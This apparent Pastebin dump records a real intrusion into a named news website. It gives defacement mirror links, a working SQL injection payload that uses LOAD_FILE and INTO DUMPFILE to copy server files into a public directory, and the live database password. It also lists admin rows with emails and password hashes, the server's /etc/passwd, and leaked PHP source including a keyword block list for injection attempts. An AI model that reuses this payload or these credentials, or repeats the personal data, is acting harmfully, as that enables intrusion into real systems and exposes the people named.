Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- http://shamshyan.com/ups/qunem_mamat.txt http://zone-h.org/mirror/id/23635970
- http://zone-h.org/mirror/id/23636075 http://img.shamshyan.com/bphotos/qunem_mamat.css
- /usr/home/sh_user/data/www/img.shamshyan.com/bphotos/
- /usr/home/sh_user/data/www/guard.shamshyan.com/config.php
- user: security
- db: security
- pass: Cw6YMwWCS77ccBYZ
- [{"title":"<?php\n\n$mysql_host = \"localhost\";\n$mysql_database = \"security\";\n$mysql_user = \"security\";\n$mysql_password = \"Cw6YMwWCS77ccBYZ\";\n$connect = mysql_connect($mysql_host, $mysql_user, $mysql_password) or die(mysql_error());\nmysql_select_db($mysql_database, $connect) or die(mysql_error());\nmysql_query(\"SET NAMES utf8\");\n\n?>,<?php\n\n$mysql_host = \"localhost\";\n$mysql_database = \"security\";\n$mysql_user = \"security\";\n$mysql_password = \"Cw6YMwWCS77ccBYZ\";\n$connect = mysql_connect($mysql_host, $mysql_user, $mysql_password) or die(mysql_error());\nmysql_select_db($mysql_database, $connect) or die(mysql_error());\nmysql_query(\"SET NAMES utf8\");\n\n?>,<?php\n\n$mysql_host = \"localhost\";\n$mysql_database = \"security\";\n$mysql_user = \"security\";\n$mysql_password = \"Cw6YMwWCS77ccBYZ\";\n$connect = mysql_connect($mysql_host, $mysql_user, $mysql_password) or die(mysql_error());\nmysql_select_db($mysql_database, $connect) or die(mysql_error());\nmysql_query(\"SET NAMES utf8\");\n\n?>,<?php\n\n$mysql_host = \"localhost\";\n$m","photo":"17","href":"\/hy\/article\/1970\/01\/01\/1\/12\/","date":"1970.01.01 03:00","other_inj":"","spec_videos":"","spec_photos":"","sham_photos":"","views":null}]
- do=getList&date=' UNION SELECT 1,2,3,4,5,6,LOAD_FILE('/usr/home/sh_user/data/www/guard.shamshyan.com/security.php'),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 INTO DUMPFILE '/usr/home/sh_user/data/www/img.shamshyan.com/bphotos/sec.css'-- '
- admin_users|,gl_clcats|,gl_images|,gl_views|,hy_category|,hy_content|,hy_group|,hy_lang|,ru_category|,ru_content|
- columns:
- user_id|,email|,user_name|,user_password|,user_login|,user_group|,posts|,avatar|,reg|,online
- admin credentials:
- |support@mxarts.net|Паша ÐйвазÑн|4fdc72a90d87d4d3c5ec21e3b18d03f5|devmode|1|586|/ups/avatars/217468_527526457282407_1784073241_n.jpg|2014-01-05 00:00:00|yes,
- <pre>2||Ô³Ö‡Õ¸Ö€Õ£ Ô·Õ´Õ«Õ¶-ÕÕ¥Ö€ÕµÕ¡Õ¶|8298213b246e3b24f6ee89438203a6bb|gevorget|1|8|/ups/avatars/1235122_662977063732178_1564691659_n.jpg|2014-01-05 00:00:00|yes,
- <pre>5|none|Marat Balayan|108910111213141516171819202122232425
- /etc/passwd
- $FreeBSD: release/10.0.0/etc/master.passwd 256366 2013-10-12 06:08:18Z rpaulo $
- #
- root:*:0:0:Charlie &:/root:/bin/csh
- toor:*:0:0:Bourne-again Superuser:/root:
- daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
- operator:*:2:5:System &:/:/usr/sbin/nologin
- bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
- tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
- kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
- games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
- news:*:8:8:News Subsystem:/:/usr/sbin/nologin
- man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
- sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
- smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
- mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
- bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
- unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
- proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
- _pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
- _dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
- uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
- pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
- auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
- www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
- hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
- nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
- sh_user:*:1001:1001:Gagik Shamshyan:/home/sh_user:/bin/sh
- mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
- //index.php
- <?php
- if($_GET['do'] == 'search') {
- include '/usr/home/sh_user/data/www/guard.shamshyan.com/config.php';
- include '/usr/home/sh_user/data/www/guard.shamshyan.com/security.php';
- }
- @session_start ();
- @ob_start ();
- @ob_implicit_flush (0);
- @error_reporting ( E_ALL ^ E_WARNING ^ E_NOTICE );
- @ini_set ( 'display_errors', true );
- @ini_set ( 'html_errors', false );
- @ini_set ( 'error_reporting', E_ALL ^ E_WARNING ^ E_NOTICE );
- define ( 'MX', true );
- define ( 'ROOT_DIR', dirname ( __FILE__ ) );
- define ( 'CORE_DIR', ROOT_DIR . '/core' );
- define ( 'MOD_DIR', ROOT_DIR . '/backend' );
- require_once CORE_DIR . '/my_config.php';
- //$memcache = new Memcache;
- //$memcache->connect('127.0.0.1', 11211) or die ("Could not connect");
- require_once CORE_DIR . '/lng.php';
- require_once CORE_DIR . '/mysql/is_mysql.php';
- require_once CORE_DIR . '/function.php';
- require_once CORE_DIR . '/frontend.php';
- require_once CORE_DIR . '/bbcode/bb_code.php';
- require_once CORE_DIR . '/login.php';
- $homepage = '/';
- $mainpage = '/'.$lang.'/';
- $altmainpage = '/index.php';
- $currentpage = $_SERVER['REQUEST_URI'];
- if($homepage == $currentpage or $altmainpage == $currentpage) {
- header("Location: http://shamshyan.com/$lang/"); /* Redirect browser */
- }
- if($mainpage == $currentpage) {$content .= $html->display("main_view");}
- define ( 'TEMPLATE_DIR', ROOT_DIR . '/frontend/'.$tpl_lang['skin'] );
- include CORE_DIR . '/get.php';
- //if($do=="article") {
- //$syear = strip_tags($_GET["syear"]);
- //$smonth = strip_tags($_GET["smonth"]);
- //$sday = strip_tags($_GET["sday"]);
- //$cid = strip_tags($_GET["cid"]);
- //global $db;
- //$xrow = $db->super_select('content','*',array('WHERE'=>"id='".$cid."' AND hide='2'"));
- //if($syear!=2014){
- //if($xrow['url_name'] == '') {
- //$href = '/'.$lang.'/article/'.syear_time($xrow['date']).'/'.smonth_time($xrow['date']).'/'.sday_time($xrow['date']).'/'.$xrow['id'].'/';
- //header('HTTP/1.1 301 Moved Permanently');
- //header('Location: '.$href.'');
- //exit();
- //} else {
- //$xhref = '/'.$lang.'/article/'.syear_time($xrow['date']).'/'.smonth_time($xrow['date']).'/'.sday_time($xrow['date']).'/'.$xrow['id'].'/'.$xrow['url_name'].'/';
- //header('HTTP/1.1 301 Moved Permanently');
- //header('Location: '.$xhref.'');
- //exit();
- //}
- //}
- //}
- foreach(explode(",",$config['bot']) as $bot){
- if($bot !== '' and preg_match("'".$bot."'si",$_SERVER['HTTP_USER_AGENT']) and $tpl_lang["skin"] !== ''){
- $tpl_lang['skin'] = $tpl_lang['skin'];
- $config['ajax'] = 'no';
- break;
- }
- }
- c_mode(); // инÑталÑÑ†Ð¸Ñ Ð¼Ð¾Ð´ÑƒÐ»ÐµÐ¹
- $user_group = user_group();
- $main_moduls = run_mode('admin/,main/','saite_mod.php','saite_mod.php');
- //$bb_code->html_init();
- $show_header = run_mode('admin/sfnews/,modul/,function/,coment/','header.php','header.php');
- foreach($show_header['path'] as $global_file => $path){
- include ROOT_DIR . $path;
- }
- $header = '<meta name="description" content="'.((isset($description)) ? $description : $tpl_lang['description']).'" />'."\n".$header;
- $header = '<meta name="keywords" content="'.((isset($keywords)) ? $keywords : $tpl_lang['keywords']).'" />'."\n".$header;
- $header = '<title>'.((isset($title)) ? $title : $tpl_lang['home_title']).'</title>'."\n".$header;
- $html->THEME = '/frontend/'.$tpl_lang['skin'];
- $html->header = $header;
- $html->content = $content;
- $html->lang = $lang;
- $html->xhomepage = '/'.$lang.'/';
- $html->ihomepage = '/index.php';
- $html->xcurrentpage = $_SERVER['REQUEST_URI'];
- $html->current_date_s = date("Y-m-d H:i");
- $html->current_date = date("Y-m-d H:i:s");
- $html->tpl_lang = $tpl_lang;
- $html->config = $config;
- $html->c_mode = $c_mode;
- $html->c_mode_type = $c_mode_type;
- $html->cat_list = $cat_list;
- $html->member_id = $member_id;
- $html->user_group = $user_group;
- $html->db = $db;
- $html->bb_code = $bb_code;
- $html->is_logged = $is_logged;
- $html->action = $action;
- $html->do = $do;
- foreach($main_moduls['path'] as $global_file => $path){
- include ROOT_DIR . $path;
- }
- if(file_exists(ROOT_DIR.'/frontend/'.$tpl_lang['skin'].'/index.php')) print $html->display("index", $id);
- else{
- print $html->no_exists('index');
- }
- ?>
- //config.php
- <?php
- $mysql_host = "localhost";
- $mysql_database = "security";
- $mysql_user = "security";
- $mysql_password = "Cw6YMwWCS77ccBYZ";
- $connect = mysql_connect($mysql_host, $mysql_user, $mysql_password) or die(mysql_error());
- mysql_select_db($mysql_database, $connect) or die(mysql_error());
- mysql_query("SET NAMES utf8");
- ?>
- //security.php
- ?php
- function isBot($botname = ''){
- /* Ðта Ñ„ÑƒÐ½ÐºÑ†Ð¸Ñ Ð±ÑƒÐ´ÐµÑ‚ проверÑÑ‚ÑŒ, ÑвлÑетÑÑ Ð»Ð¸ поÑетитель роботом поиÑковой ÑиÑтемы */
- $bots = array(
- 'rambler','googlebot','aport','yahoo','msnbot','turtle','mail.ru','omsktele',
- 'yetibot','picsearch','sape.bot','sape_context','gigabot','snapbot','alexa.com',
- 'megadownload.net','askpeter.info','igde.ru','ask.com','qwartabot','yanga.co.uk',
- 'scoutjet','similarpages','oozbot','shrinktheweb.com','aboutusbot','followsite.com',
- 'dataparksearch','google-sitemaps','appEngine-google','feedfetcher-google',
- 'liveinternet.ru','xml-sitemaps.com','agama','metadatalabs.com','h1.hrn.ru',
- 'googlealert.com','seo-rus.com','yaDirectBot','yandeG','yandex',
- 'yandexSomething','Copyscape.com','AdsBot-Google','domaintools.com',
- 'Nigma.ru','bing.com','dotnetdotcom'
- );
- foreach($bots as $bot)
- if(stripos($_SERVER['HTTP_USER_AGENT'], $bot) !== false){
- $botname = $bot;
- return true;
- }
- return false;
- }
- //Anti XSS (Cross-site Scripting)
- function security($input)
- {
- @$input = mysql_real_escape_string($input);
- @$input = strip_tags($input);
- @$input = stripslashes($input);
- return $input;
- }
- //getBrowser Function
- function getBrowser()
- {
- $u_agent = $_SERVER['HTTP_USER_AGENT'];
- $bname = 'Unknown';
- $platform = 'Unknown';
- $version = "";
- //First get the platform
- if (preg_match('/linux/i', $u_agent)) {
- $platform = 'Linux';
- } elseif (preg_match('/macintosh|mac os x/i', $u_agent)) {
- $platform = 'Mac';
- } elseif (preg_match('/windows|win32/i', $u_agent)) {
- $platform = 'Windows';
- }
- // Next get the name of the useragent yes seperately and for good reason
- if (preg_match('/MSIE/i', $u_agent) && !preg_match('/Opera/i', $u_agent)) {
- $bname = 'Internet Explorer';
- $ub = "MSIE";
- } elseif (preg_match('/Firefox/i', $u_agent)) {
- $bname = 'Mozilla Firefox';
- $ub = "Firefox";
- } elseif (preg_match('/Chrome/i', $u_agent)) {
- $bname = 'Google Chrome';
- $ub = "Chrome";
- } elseif (preg_match('/Safari/i', $u_agent)) {
- $bname = 'Apple Safari';
- $ub = "Safari";
- } elseif (preg_match('/Opera/i', $u_agent)) {
- $bname = 'Opera';
- $ub = "Opera";
- } elseif (preg_match('/Netscape/i', $u_agent)) {
- $bname = 'Netscape';
- $ub = "Netscape";
- }
- // finally get the correct version number
- $known = array(
- 'Version',
- $ub,
- 'other'
- );
- $pattern = '#(?<browser>' . join('|', $known) . ')[/ ]+(?<version>[0-9.|a-zA-Z.]*)#';
- if (!preg_match_all($pattern, $u_agent, $matches)) {
- // we have no matching number just continue
- }
- // See how many we have
- $i = count($matches['browser']);
- if ($i != 1) {
- //We will have two since we are not using 'other' argument yet
- //See if version is before or after the name
- if (strripos($u_agent, "Version") < strripos($u_agent, $ub)) {
- $version = $matches['version'][0];
- } else {
- $version = $matches['version'][1];
- }
- } else {
- $version = $matches['version'][0];
- }
- // Check if we have a number
- if ($version == null || $version == "") {
- $version = "?";
- }
- return array(
- 'userAgent' => $u_agent,
- 'name' => $bname,
- 'version' => $version,
- 'platform' => $platform,
- 'pattern' => $pattern
- );
- }
- $ua = getBrowser();
- //Getting visitor country
- function visitor_country()
- {
- $client = @$_SERVER['HTTP_CLIENT_IP'];
- $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
- $remote = $_SERVER['REMOTE_ADDR'];
- $result = "Unknown";
- if (filter_var($client, FILTER_VALIDATE_IP)) {
- $ip = $client;
- } elseif (filter_var($forward, FILTER_VALIDATE_IP)) {
- $ip = $forward;
- } else {
- $ip = $remote;
- }
- $ip_data = @json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=" . $ip));
- if ($ip_data && $ip_data->geoplugin_countryName != null) {
- $result = $ip_data->geoplugin_countryName;
- }
- return $result;
- }
- //Checking if phpGuard is enabled
- @$query = mysql_query("SELECT * FROM settings");
- @$row = mysql_fetch_assoc($query);
- if ($row['phpguard_enabled'] == "Yes" and !isBot()) {
- //Ban System
- $guestip = $_SERVER['REMOTE_ADDR'];
- @$querybanned = mysql_query("SELECT * FROM `bans` WHERE ip='$guestip'");
- @$banned = mysql_num_rows($querybanned);
- @$row = mysql_fetch_array($querybanned);
- @$queryb = mysql_query("SELECT * FROM settings");
- @$rowb = mysql_fetch_assoc($queryb);
- if ($banned > 0) {
- header('HTTP/1.1 403 Forbidden');
- exit();
- }
- //Country Ban
- @$country = visitor_country();
- @$querybanned = mysql_query("SELECT * FROM `bans-country` WHERE country='$country'");
- @$banned = mysql_num_rows($querybanned);
- @$row = mysql_fetch_array($querybanned);
- @$queryb = mysql_query("SELECT * FROM settings");
- @$rowb = mysql_fetch_assoc($queryb);
- if ($banned > "0") {
- header('HTTP/1.1 403 Forbidden');
- exit();
- }
- //Anti SQLi (SQL Injection)
- @$query = mysql_query("SELECT * FROM settings");
- @$row = mysql_fetch_assoc($query);
- if ($row['sqli_protection'] == "Yes") {
- $array = array(
- "union",
- "sql",
- "mysql",
- "database",
- "cookie",
- "coockie",
- "select",
- "from",
- "where",
- "benchmark",
- "concat",
- "table",
- "into",
- "by",
- "limit",
- "ALL",
- "values",
- "exec",
- "shell",
- "truncate",
- "wget",
- "/**/",
- "0x3a",
- "password",
- "BUN",
- "char",
- "S@BUN",
- "null",
- "'%",
- "OR%"
- );
- foreach ($array as $d) {
- @$string = security($_SERVER['QUERY_STRING']);
- if (strpos(strtolower($string), $d) !== false) {
- $ip = $_SERVER['REMOTE_ADDR'];
- $loc = $_SERVER['PHP_SELF'];
- @$browser = $ua['name'];
- @$browser_version = $ua['version'];
- @$os = $ua['platform'];
- @$country = visitor_country();
- $date = date("d F Y");
- $time = date("H:i");
- $attacked_page = security('' . $loc . '?' . $string . '');
- $type = "SQL Injection";
- if ($row['sqli_logging'] == "Yes") {
- @$queryvalid = mysql_query("SELECT * FROM `hacker-attacks` WHERE ip='$ip' and attacked_page='$attacked_page' and type='SQL Injection' LIMIT 1");
- @$validator = mysql_num_rows($queryvalid);
- if ($validator > "0") {
- header( "Refresh: 0; url=".$row['sqli_redirect']."" );
- } else {
- $log = "INSERT INTO `hacker-attacks` (ip, date, time, attacked_page, type, browser, browser_version, os, country) VALUES ('$ip', '$date', '$time', '$attacked_page', '$type', '$browser', '$browser_version', '$os', '$country')";
- @$result = mysql_query($log);
- header( "Refresh: 0; url=".$row['sqli_redirect']."" );
- }
- }
- if ($row['sqli_autoban'] == "Yes") {
- @$bansvalid = mysql_query("SELECT * FROM `bans` WHERE ip='$ip' LIMIT 1");
- @$bansvalidator = mysql_num_rows($bansvalid);
- if ($bansvalidator > "0") {
- header( "Refresh: 0; url=".$row['sqli_redirect']."" );
- exit();
- } else {
- $log = "INSERT INTO `bans` (ip, date, time, reason, redirect, autoban) VALUES ('$ip', '$date', '$time', '$type', 'No', 'Yes')";
- @$result = mysql_query($log);
- header( "Refresh: 0; url=".$row['sqli_redirect']."" );
- exit();
- }
- }
- }
- }
- }
- @$query = mysql_query("SELECT * FROM settings");
- @$row = mysql_fetch_assoc($query);
- if ($row['proxy_protection'] == "Yes") {
- //Anti Proxy
- $proxy_headers = array(
- 'HTTP_VIA',
- 'HTTP_X_FORWARDED_FOR',
- 'HTTP_FORWARDED_FOR',
- 'HTTP_X_FORWARDED',
- 'HTTP_FORWARDED',
- 'HTTP_CLIENT_IP',
- 'HTTP_FORWARDED_FOR_IP',
- 'VIA',
- 'X_FORWARDED_FOR',
- 'FORWARDED_FOR',
- 'X_FORWARDED',
- 'FORWARDED',
- 'CLIENT_IP',
- 'FORWARDED_FOR_IP',
- 'HTTP_PROXY_CONNECTION',
- 'HTTP_PC_REMOTE_ADDR',
- 'HTTP_X_IMFORWARDS',
- 'HTTP_XROXY_CONNECTION'
- );
- foreach ($proxy_headers as $proxy_header) {
- if (isset($_SERVER[$proxy_header])) {
- $ip = $_SERVER['REMOTE_ADDR'];
- @$browser = $ua['name'];
- @$browser_version = $ua['version'];
- @$os = $ua['platform'];
- @$country = visitor_country();
- $date = date("d F Y");
- $time = date("H:i");
- $type = "Proxy";
- if ($row['proxy_logging'] == "Yes") {
- @$queryvalid2 = mysql_query("SELECT * FROM `hacker-attacks` WHERE ip='$ip' and type='Proxy' LIMIT 1");
- @$validator2 = mysql_num_rows($queryvalid2);
- if ($validator2 > "0") {
- header( "Refresh: 0; url=".$row['proxy_redirect']."" );
- } else {
- $log2 = "INSERT INTO `hacker-attacks` (ip, date, time, attacked_page, type, browser, browser_version, os, country) VALUES ('$ip', '$date', '$time', '$attacked_page', '$type', '$browser', '$browser_version', '$os', '$country')";
- @$result2 = mysql_query($log2);
- header( "Refresh: 0; url=".$row['proxy_redirect']."" );
- }
- }
- if ($row['proxy_autoban'] == "Yes") {
- @$bansvalid = mysql_query("SELECT * FROM `bans` WHERE ip='$ip' LIMIT 1");
- @$bansvalidator = mysql_num_rows($bansvalid);
- if ($bansvalidator > "0") {
- header( "Refresh: 0; url=".$row['proxy_redirect']."" );
- exit();
- } else {
- $log = "INSERT INTO `bans` (ip, date, time, reason, redirect, autoban) VALUES ('$ip', '$date', '$time', '$type', 'No', 'Yes')";
- @$result = mysql_query($log);
- header( "Refresh: 0; url=".$row['proxy_redirect']."" );
- exit();
- }
- }
- }
- }
- }
- @$query = mysql_query("SELECT * FROM settings");
- @$row = mysql_fetch_assoc($query);
- $xguestip = $_SERVER['REMOTE_ADDR'];
- @$xquerybanned = mysql_query("SELECT * FROM `bans` WHERE ip='$xguestip' and type='DDoS'");
- @$xbanned = mysql_num_rows($xquerybanned);
- if ($xbanned < 1) {
- if ($row['ddos_protection'] == "Yes") {
- //Anti DDoS (Distributed Denial of Service Attacks)
- if (!isset($_SESSION)) { @session_start(); }
- if($_SESSION['xlast_session_requestx'] > (time() - 0.3)){
- if(empty($_SESSION['xlast_request_countx'])){
- $_SESSION['xlast_request_countx'] = 1;
- }elseif($_SESSION['xlast_request_countx'] < 5){
- $_SESSION['xlast_request_countx'] = $_SESSION['xlast_request_countx'] + 1;
- }elseif($_SESSION['xlast_request_countx'] >= 5){
- $ip = $_SERVER['REMOTE_ADDR'];
- @$browser = $ua['name'];
- @$browser_version = $ua['version'];
- @$os = $ua['platform'];
- @$country = visitor_country();
- $date = date("d F Y");
- $time = date("H:i");
- $type = "DDoS";
- if ($row['ddos_autoban'] == "Yes") {
- $log = "INSERT INTO `bans` (ip, date, time, reason, redirect, autoban) VALUES ('$ip', '$date', '$time', '$type', 'No', 'Yes')";
- @$result = mysql_query($log);
- $log3 = "INSERT INTO `hacker-attacks` (ip, date, time, attacked_page, type, browser, browser_version, os, country) VALUES ('$ip', '$date', '$time', '$attacked_page', '$type', '$browser', '$browser_version', '$os', '$country')";
- @$result3 = mysql_query($log3);
- header( "Refresh: 0; url=".$row['ddos_redirect']."" );
- exit;
- }
- } else {
- $_SESSION['xlast_request_countx'] = 1;
- }
- }
- $_SESSION['xlast_session_requestx'] = time();
- }
- }
- @$query = mysql_query("SELECT * FROM settings");
- @$row = mysql_fetch_assoc($query);
- if ($row['spam_protection'] == "Yes") {
- //DNSBL Spam Security
- $ip = $_SERVER['REMOTE_ADDR'];
- @$browser = $ua['name'];
- @$browser_version = $ua['version'];
- @$os = $ua['platform'];
- @$country = visitor_country();
- $date = date("d F Y");
- $time = date("H:i");
- $type = "Spam";
- $dnsbl_lookup = array(
- //"dnsbl.solid.net",
- "dnsbl-1.uceprotect.net",
- "dnsbl-2.uceprotect.net",
- "dnsbl-3.uceprotect.net",
- "dnsbl.dronebl.org",
- "dnsbl.sorbs.net",
- "zen.spamhaus.org"
- );
- $reverse_ip = implode(".", array_reverse(explode(".", $ip)));
- foreach ($dnsbl_lookup as $host) {
- if (checkdnsrr($reverse_ip . "." . $host . ".", "A")) {
- @$queryvalid4 = mysql_query("SELECT * FROM `hacker-attacks` WHERE ip='$ip' and type='Spam' LIMIT 1");
- @$validator4 = mysql_num_rows($queryvalid4);
- if ($validator4 > "0") {
- header( "Refresh: 0; url=".$row['spam_redirect']."" );
- } else {
- $log4 = "INSERT INTO `hacker-attacks` (ip, date, time, attacked_page, type, browser, browser_version, os, country) VALUES ('$ip', '$date', '$time', '$attacked_page', '$type', '$browser', '$browser_version', '$os', '$country')";
- @$result4 = mysql_query($log4);
- header( "Refresh: 0; url=".$row['spam_redirect']."" );
- }
- if ($row['spam_autoban'] == "Yes") {
- @$bansvalid = mysql_query("SELECT * FROM `bans` WHERE ip='$ip' LIMIT 1");
- @$bansvalidator = mysql_num_rows($bansvalid);
- if ($bansvalidator > "0") {
- header( "Refresh: 0; url=".$row['spam_redirect']."" );
- exit();
- } else {
- $log = "INSERT INTO `bans` (ip, date, time, reason, redirect, autoban) VALUES ('$ip', '$date', '$time', '$type', 'No', 'Yes')";
- @$result = mysql_query($log);
- header( "Refresh: 0; url=".$row['spam_redirect']."" );
- exit();
- }
- }
- }
- }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement